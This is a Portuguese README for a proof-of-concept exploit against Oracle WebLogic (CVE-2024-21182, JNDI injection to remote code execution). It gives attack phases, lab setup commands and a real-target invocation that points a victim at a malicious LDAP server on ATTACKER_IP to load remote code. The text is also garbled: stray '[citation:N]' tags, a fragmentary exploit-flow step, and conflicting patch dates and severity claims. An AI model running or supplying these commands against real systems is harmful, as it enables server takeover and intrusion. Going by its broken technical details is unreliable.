
Exploit de prova de conceito para CVE-2024-21182, uma injeção JNDI não autenticada que leva à execução remota de código no Oracle WebLogic Server através dos protocolos T3/IIOP. Inclui um laboratório Docker para testes.
CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE
CVE-2024-21182 é uma vulnerabilidade de injeção JNDI não autenticada que afeta o componente Core do Oracle WebLogic Server. Permite que um atacante remoto, através dos protocolos T3 ou IIOP, execute código arbitrário (RCE) no servidor, podendo obter acesso completo a todos os dados do servidor[citation:5][citation:8][citation:9].
Este repositório contém um Proof of Concept (PoC) funcional que demonstra a exploração bem-sucedida do patch de CVE-2023-21839 através da cadeia de gadgets AggregatableOpaqueReference + MessageDestinationReference[citation:2][citation:4].
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Fase 1: Reconhecimento: Identificar servidores WebLogic com as portas T3/IIOP (7001) expostas.
Fase 2: Análise: Determinar se o servidor executa uma versão vulnerável (12.2.1.4.0 ou 14.1.1.0.0) ou carece do patch de Outubro 2024.
Fase 3: Exploração (fluxo técnico):
AggregatableOpaqueReference[citation:2].referent do objeto anterior para que aponte para um MessageDestinationReference malicioso[citation:4].wlthint3client.jar (pode ser extraído de uma instalação do WebLogic).# 1. Clonar o repositório
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182
# 2. Iniciar o laboratório (vítima + atacante)
docker-compose up -d
# 3. Executar a exploração automática
./validate.sh
Exploração contra um alvo real (autorizado)
bash
# 1. Iniciar o servidor LDAP/HTTP malicioso
python3 exploit/ldap_server.py
# 2. Em outro terminal, executar o payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil
📊 Impacto Demonstrado
Execução remota de comandos (RCE) no servidor
Acesso não autorizado a dados críticos da aplicação
Comprometimento completo do servidor de aplicações
Potencial porta de entrada para movimento lateral na rede corporativa
Base para implantação de ransomware ou outras cargas maliciosas
Status atual segundo CISA: "Known To Be Used in Ransomware Campaigns? Unknown" (Mas tipicamente sim, RCEs em middleware são vetor inicial em intrusões de ransomware).
🛡️ Mitigação
Aplicar patch imediatamente: Aplicar o Critical Patch Update da Oracle de Outubro 2024 ou posterior.
Restrição de rede: Bloquear/limitar o acesso às portas T3/IIOP (ex. 7001) apenas a origens confiáveis.
Monitoramento: Detectar tentativas de bind/lookup incomuns na árvore JNDI.
⚠️ Aviso Legal
Este código é exclusivamente para fins educacionais e de pesquisa. O uso indevido deste PoC contra sistemas sem autorização expressa é ilegal. O autor não se responsabiliza pelo mau uso desta informação.
📚 Referências
NVD - CVE-2024-21182
CISA KEV Catalog
Oracle Security Advisory
Análise técnica original
🤝 Créditos
Pesquisador original que descobriu a cadeia de gadgets
dinosn pelo laboratório reproduzível em Docker
| Atributo | Valor |
|---|
| CVE | CVE-2024-21182 |
| Produto | Oracle WebLogic Server (Core) |
| Versões afetadas | 12.2.1.4.0 e 14.1.1.0.0[citation:7] |
| Patch disponível | Oracle Critical Patch Update (Julho 2024 e Outubro 2024)[citation:6] |
| Status no CISA KEV | Exploração ativa confirmada (adicionada em 01/06/2026)[citation:3][citation:8] |
| Data limite de mitigação (CISA) | 04/06/2026[citation:8] |